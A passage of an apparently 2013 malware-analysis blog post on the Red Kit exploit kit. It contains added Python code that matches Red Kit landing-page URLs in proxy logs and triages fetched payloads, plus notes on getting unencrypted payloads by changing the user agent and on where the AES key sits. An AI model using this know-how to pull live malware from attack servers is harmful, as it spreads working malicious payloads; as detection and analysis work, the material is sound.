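The URL pattern above run over a few constructed proxy log lines, as an added Python example that is not part of the original post. The pattern as written requires the ".html" extension; the loosened variant that also accepts ".htm" is an assumption added here, and the hostnames in the sample log are made up.

```python
import re

# The pattern exactly as given in the post: four lowercase letters, ".html?",
# a one-character parameter name and a six-digit value.
REDKIT_URL_RE = re.compile(r"[a-z][a-z][a-z][a-z]\.html\?.=[0-9][0-9][0-9][0-9][0-9][0-9]")

# Assumption added here, not from the post: the same pattern with the trailing
# "l" optional, so a landing page served as ".htm" is caught as well.
REDKIT_URL_LOOSE_RE = re.compile(r"[a-z][a-z][a-z][a-z]\.html?\?.=[0-9][0-9][0-9][0-9][0-9][0-9]")

# Constructed proxy log lines, "<epoch> <client> <method> <url>"; all hosts are made up.
SAMPLE_LOG = """\
1362942556 ws-17 GET hxxp://referrer-site.invalid/mhed.html?j=449177
1362942558 ws-17 GET hxxp://landing-site.invalid/mhed.htm?j=449177
1362942559 ws-17 GET hxxp://landing-site.invalid/332.jar
1362942560 ws-22 GET hxxp://example.invalid/index.html?page=12
1362942561 ws-22 GET hxxp://example.invalid/abcd.html?id=449177
"""

def scan_log(log_text, pattern=REDKIT_URL_RE):
    """Return the request URLs of all log lines matching the pattern, in log order."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # empty or malformed line
        url = fields[3]
        if pattern.search(url):
            hits.append(url)
    return hits

def landing_ids(urls):
    """The six-digit values from matching URLs, useful for tying a redirect chain together."""
    ids = set()
    for url in urls:
        m = re.search(r"\?.=([0-9]{6})", url)
        if m:
            ids.add(m.group(1))
    return sorted(ids)

if __name__ == "__main__":
    print("strict:", scan_log(SAMPLE_LOG))                       # the .html request only
    print("loose: ", scan_log(SAMPLE_LOG, REDKIT_URL_LOOSE_RE))  # the .htm request as well
    print("ids:   ", landing_ids(scan_log(SAMPLE_LOG, REDKIT_URL_LOOSE_RE)))
```

The two lines from example.invalid show why the one-character parameter and the six-digit value matter: "page=12" and "id=449177" both fail the pattern, which keeps ordinary query strings out of the alert stream.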


Still some fun left here, but no time today. Hopefully tomorrow...

Update 2013-03-13
Well, I just wanted to revisit my .exe file to figure out what was wrong. Since I had not analyzed it properly, I thought there was some XOR scheme or encryption/obfuscation I had overlooked.

So I started up my remnux box and got:



First densityscout, with a low value indicating that these are pretty random bytes. So it is either some kind of encryption or a rotating XOR. xorsearch told me there was no single-byte XOR match either :(
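The triage reasoning above (no MZ at the start, densityscout says the bytes look random, xorsearch finds no single-byte key), as an added Python example that is not part of the original post. The PE header skeleton and the uniform byte blob are constructed stand-ins, not the sample from the post, and the 7.0 bits-per-byte threshold is an assumption.

```python
import math
from collections import Counter

def shannon_entropy(data):
    """Bits per byte: near 0 for constant data, close to 8 for random or encrypted data."""
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def looks_like_pe(data):
    """'MZ' at offset 0 and 'PE\\0\\0' at the e_lfanew offset stored at 0x3c."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def single_byte_xor_key(data):
    """Key under which data decodes to a PE, else None. A one-byte XOR key is fixed
    by the first byte (it has to decode to 'M'), so only one candidate needs checking."""
    if len(data) < 0x40:
        return None
    key = data[0] ^ ord("M")
    head = bytes(b ^ key for b in data[:0x40])
    if key == 0 or head[:2] != b"MZ":
        return None  # key 0 would mean the data was never XORed
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    sig = bytes(b ^ key for b in data[e_lfanew:e_lfanew + 4])
    return key if sig == b"PE\x00\x00" else None

def triage(data, entropy_threshold=7.0):
    """Classify a fetched payload the way the update reasons about 62.exe."""
    if looks_like_pe(data):
        return "plain PE"
    key = single_byte_xor_key(data)
    if key is not None:
        return "PE under single-byte XOR, key 0x%02x" % key
    if shannon_entropy(data) >= entropy_threshold:
        return "high entropy, no single-byte XOR key: probably real encryption"
    return "unknown format"

def fake_pe(size=4096):
    """Constructed DOS/PE header skeleton (not a real executable)."""
    buf = bytearray(size)
    buf[0:2], buf[0x3C:0x40], buf[0x80:0x84] = b"MZ", (0x80).to_bytes(4, "little"), b"PE\x00\x00"
    return bytes(buf)

def uniform_blob(size=4096):
    """Constructed stand-in for ciphertext: every byte value equally often, entropy 8.0."""
    return (bytes(range(256)) * (size // 256 + 1))[:size]
```

A file that lands in the "high entropy" bucket is where the user-agent question below comes in: a payload the server deliberately encrypted will not yield to XOR guessing, and the fix is to fetch it the way the real victim would.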

Then I went back to my log for the fetch and noticed that I had used "Java" as the user agent, and I remembered that Red Kit then serves encrypted .exe files.

Then everything went smoother and here is the quick analysis:
setup.exe
MD5: 06c907401d42dc218f3ca9b83b4d07ce
Virustotal: 28/45


Great post by n3mes1s covering analysis of the PDF as well.
PS: it seems we only need the "Accept: " header for the PDF fetch.


Happy Red Kit EK malware file stealing!


Post-publish reading:
Kahu Security - "Digging deeper into redkit"
Malwageddon - "RedKit: Lights! Camera! Action --- Part 2"
malforsec - "Redkit payload decryption"

2 comments:

  1. After you remembered you had used "Java" as user agent and that you would get encrypted .exe files from Red Kit - what did you have to do to decrypt the .exe?

  2. Since I used Java in the user agent I got an encrypted file. It's encrypted with AES and the KEY and IV are in the JAR file.

    Since the info is published elsewhere I decided to publish as well: http://malforsec.blogspot.com/2013/05/redkit-payload-decryption.html
